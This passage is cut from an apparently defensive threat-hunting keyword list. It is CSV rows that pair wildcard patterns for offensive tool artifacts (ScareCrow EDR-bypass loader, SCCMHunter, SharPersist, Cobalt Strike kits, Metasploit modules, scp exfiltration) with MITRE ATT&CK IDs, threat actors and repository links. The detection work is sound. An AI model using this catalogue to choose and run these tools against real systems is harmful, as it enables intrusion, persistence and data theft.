- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow/limelighter*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow/Loader*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow/Utils*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,1,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z 
-*ScareCrow_*_darwin_amd64*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow_*_linux_amd64*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow_*amd64*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*ScareCrow_checksums.txt*,offensive_tool_keyword,ScareCrow,ScareCrow - Payload creation framework designed around EDR bypass.,T1548 - T1562 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/ScareCrow,1,1,N/A,N/A,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -*SCCM_DLLSiteloading.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*sccmdecryptpoc.*,offensive_tool_keyword,sccmdecryptpoc,SCCM Account Password Decryption POC,T1555.003,TA0006,N/A,N/A,Credential Access,https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sccmhunter.db,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - 
TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*sccmhunter.git*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*sccmhunter.py*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*sccmwtf.py*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*scdivert localhost *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*scheduledtask_utils.py *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation 
tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*ScheduleRunner.csproj*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,1,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*ScheduleRunner.exe*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,1,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*ScheduleRunner.sln*,offensive_tool_keyword,ScheduleRunner,A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation,T1210 T1570 T1021 T1550,TA0008,N/A,N/A,Persistence,https://github.com/netero1010/ScheduleRunner,1,1,N/A,N/A,3,299,42,2022-07-05T10:24:45Z,2021-10-12T15:27:32Z -*schlamperei.x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*schshell.cna*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*schtask_callback*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*SchTaskBackdoor.*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*schtasks /query /v /fo LIST*,greyware_tool_keyword,schtasks,view detailed information about all the scheduled tasks.,T1053.005 - T1082,TA0004 - TA0007,N/A,N/A,Discovery,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*schtasks_elevator*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*schtasks_exploit *,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,0,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*schtasksabuse.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SchTasksImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*schtquery * full*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*scout aws --profile default -f*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*scout azure --cli*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*scp * *@*:*,greyware_tool_keyword,scp,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A 
-*scp *@*:* *,greyware_tool_keyword,scp,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*screen /dev/ttyACM0 115200*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*screen_spy.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*screengrab.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*screenshot_inject *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*screenspy.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Screetsec*,offensive_tool_keyword,Github Username,github username hosting post exploitation tools,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Screetsec,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*screetsec/Microsploit*,offensive_tool_keyword,BruteSploit,Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Microsploit,1,1,N/A,N/A,5,430,133,2017-07-11T16:28:27Z,2017-03-16T05:26:55Z -*screetsec/Pateensy*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*screetsec/Sudomy*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*screetsec/Vegile*,offensive_tool_keyword,Sudomy,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. 
There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,1,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*--script broadcast-dhcp-discover*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*script/xor-bin.py*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*scripthost_uac_bypass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*scripts*Remote-WmiExecute.*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*scripts*Search-EventForUser.ps1*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ScriptSentry-main.zip*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*ScRunBase32.exe*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 